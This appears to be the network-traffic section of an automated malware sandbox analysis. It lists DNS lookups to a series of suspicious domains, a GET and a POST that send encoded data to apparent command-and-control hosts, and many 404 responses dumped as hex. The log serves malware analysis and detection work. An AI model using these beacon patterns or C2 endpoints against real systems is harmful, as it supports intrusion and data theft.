                Source: global trafficHTTP traffic detected: GET /utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mzkd6gp5.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.kx22368.shop
                Source: global trafficDNS traffic detected: DNS query: www.laduta.xyz
                Source: global trafficDNS traffic detected: DNS query: www.einpisalpace.shop
                Source: global trafficDNS traffic detected: DNS query: www.ripbgs.info
                Source: global trafficDNS traffic detected: DNS query: www.0303588a47.buzz
                Source: global trafficDNS traffic detected: DNS query: www.tizzles.tech
                Source: global trafficDNS traffic detected: DNS query: www.explorevision.xyz
                Source: global trafficDNS traffic detected: DNS query: www.babyzhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.mzkd6gp5.top
                Source: global trafficDNS traffic detected: DNS query: www.potorooqr.lol
                Source: unknownHTTP traffic detected: POST /d89m/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.laduta.xyzOrigin: http://www.laduta.xyzReferer: http://www.laduta.xyz/d89m/Cache-Control: no-cacheContent-Length: 209Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30Data Raw: 43 76 69 54 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 47 4c 70 76 43 61 69 36 56 70 41 76 33 50 58 63 61 63 45 7a 31 54 56 4d 2b 4c 41 49 31 49 66 2f 63 6c 46 70 65 49 71 77 62 5a 5a 2b 38 36 4b 30 76 70 49 70 50 67 65 31 6a 73 39 46 42 6f 6c 79 32 6f 51 46 30 6a 75 59 4c 62 6a 4f 72 79 54 36 77 73 39 33 43 59 51 76 37 55 76 59 50 51 38 56 4a 57 6c 63 41 49 49 6f 74 6c 36 4d 59 57 4c 36 4e 4e 6e 52 36 42 37 4d 2b 6e 56 55 70 30 39 55 6c 70 48 4d 62 58 45 73 71 64 42 31 5a 52 4e 33 62 6b 52 33 67 7a 6e 34 77 59 61 78 58 4b 38 34 75 66 68 5a 5a 37 50 4b 70 6a 4f 62 39 56 49 4a 75 6b 6d 66 61 44 35 6c 75 31 49 32 6b 6e 6f 34 Data Ascii: CviT=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:34:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmpM3e1wafTDo8ga%2BUvIiVhequ6JWzaXHwyFkY3Wtg%2Baqy3WG8c5k9kX%2BlCkstptVF8%2FMjmTyhZNDZrripHRhR%2BolcTYrFXfZ1Bh89us%2FW5piyDAF3Fq5TRk8LdtXiZxl7lO8xmkg3Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cb7bf2b1899-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:34:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEg6bJs24FeUKbn5b7tRjZ7zFMqVEmQN90RQuuBz2mcvn9pYi0iOORnh7jhDvJCS4TU4bT36Awk7kHDeo5S6OU%2BBOVfvJ8xcZeoVzz93Tnhj3D7ypZmxzplCgffOZRpzqTPDo3o8sy4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cc79d5b41f3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 d4 dc 96 52 c5 70 Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQfRp
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:34:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3M1oF1vOrNdQRcOIOkTYK8qG2pt%2Bv5ePrYws651IVelprKnVaXWqEw6TQPWWYFFWnfHnt97r6FyfPi8%2BfWvgDg5Bho8WL3gGGzoVdHsd05XUjk1Tc4wBO7SJrgTDNAc9lTUbC4XKZQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cddecff8ce0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1992&rtt_var=996&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1824&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 d4 dc 96 Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Snvxd1puUF9o2Mz0OAQuGkTECCtcN46uuYGC4cbROHn8UIIb6iVPMLI8jOph7xzpmEa%2F2JuptClsjS1dEl%2BbjFmDTnRsKUZMy%2FP5VL7y7t8Y2w6nRn1idTfAUdK6Y613lb8sYwznWBI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cedebf9421f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:36:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RC2qw032OEnNs%2BmHTjkFpusK2%2FpAfFZhhfvEXxqZxN7IbuYilUOenkXrwRJbtV9%2BGxaiUjJL0YiOz%2B3kIp35M2FXX4nsqXFLxurg5V2cLZKhVkM6m6hd01ybBlGMM5Q7nQhr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140e867f2f8ce0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=772&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:36:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeNl2hckcJYVSxWr37%2FQLF6aX8xIag%2Fdkg%2FtqmU00yrE%2B0b7KCkQpWd2pY7nrskp12m9%2FlcVpG4L6jAdG93%2B8jr%2FOjl6gfmJynCtKa48Dhei%2FGbAHwD0GsB1WKrDaRPD7%2BNT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140e96584b1899-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1695&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 